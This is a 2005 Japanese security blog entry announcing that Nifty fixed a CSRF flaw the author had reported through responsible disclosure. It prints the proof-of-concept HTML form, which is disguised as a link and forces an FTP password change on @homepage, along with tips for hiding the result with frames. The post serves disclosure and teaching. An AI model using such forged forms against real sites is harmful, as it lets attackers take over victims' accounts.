水無月ばけらのえび日記

bakera.jp > 水無月ばけらのえび日記 > CSRF 直った

CSRF 直った

2005年10月30日(日曜日)

CSRF 直った

ニフティ系のもろもろがいろいろ直ったという報告がありました。私は退会済みなので確認できませんが、まあ修正報告があったからには大丈夫でしょう。

脆弱性届出状況2005年Q1」あたりで CSRF による強制パスワード変更の可能性について軽く臭わせることを書いていましたが、実際に「@homepage 管理画面において、CSRF 攻撃によって FTP のパスワードが強制変更される」というものを届け出ていたのでした。届出に記載していた PoC コードはこんな感じ。

<form action="https://homepage.nifty.com/cgi-bin/HP_ChangePW.cgi" method="POST">

<p>例の話ですが、ニフティ会員の方は以下で見られます (要パスワード)。</p>

<input type="hidden" name="DISP_PAGE" value="ftp200.htm">

<input type="hidden" name="FTPPASSWD" maxlength="8" size="15" value="XXXXXXXX">

<input type="hidden" name="NEWFTPPASSWD" maxlength="8" size="15" value="XXXXXXXX">

<input type="submit" style="background:transparent;border:none;text-decoration:underline;color:#00f;cursor:hand" value="例の話詳細">

</form>

押すと、Basic 認証のダイアログが出ます (既にログイン済みでなければ、ですが)。そこで素直にパスワードを入れると、パスワード変更完了画面が表示されて後の祭りです。

※まあ、パスワード変更完了画面を見られてしまうとばれてしまうので、本気で攻撃 (!?) する場合には完了画面をうまく隠す必要があるでしょう。フレームを使うなど、カモフラージュの方法はいくらでもあります。

昔ニフティには「インターウェイ」という Web インターフェイスがあって、フォーラムの発言などを Web 上で閲覧することができるようになっていました。そのアクセス制御には Basic 認証が使われていました。そんなわけなので、「ニフティの会員制のコンテンツですよー」と断ってリンクを書いておくと、Basic 認証のダイアログが出てきても不自然さが微塵もないという。

これの他にもいろいろと直ったらしいですね。お疲れ様でした。

関連する話題: セキュリティ / ニフティ / CSRF / 情報セキュリティ早期警戒パートナーシップ

最近の日記

関わった本など

インクルーシブHTML+CSS & JavaScript 多様なユーザーニーズに応えるフロントエンドデザインパターンデザイニングWebアクセシビリティ - アクセシブルな設計やコンテンツ制作のアプローチコーディングWebアクセシビリティ - WAI-ARIAで実現するマルチデバイス環境のWebアプリケーション体系的に学ぶ 安全なWebアプリケーションの作り方 脆弱性が生まれる原理と対策の実践ウェブの仕事力が上がる標準ガイドブック 5 WebプログラミングWeb Site Expert #13Dreamweaver プロフェッショナル・スタイル [CS3対応] (Style for professional)

その他サイト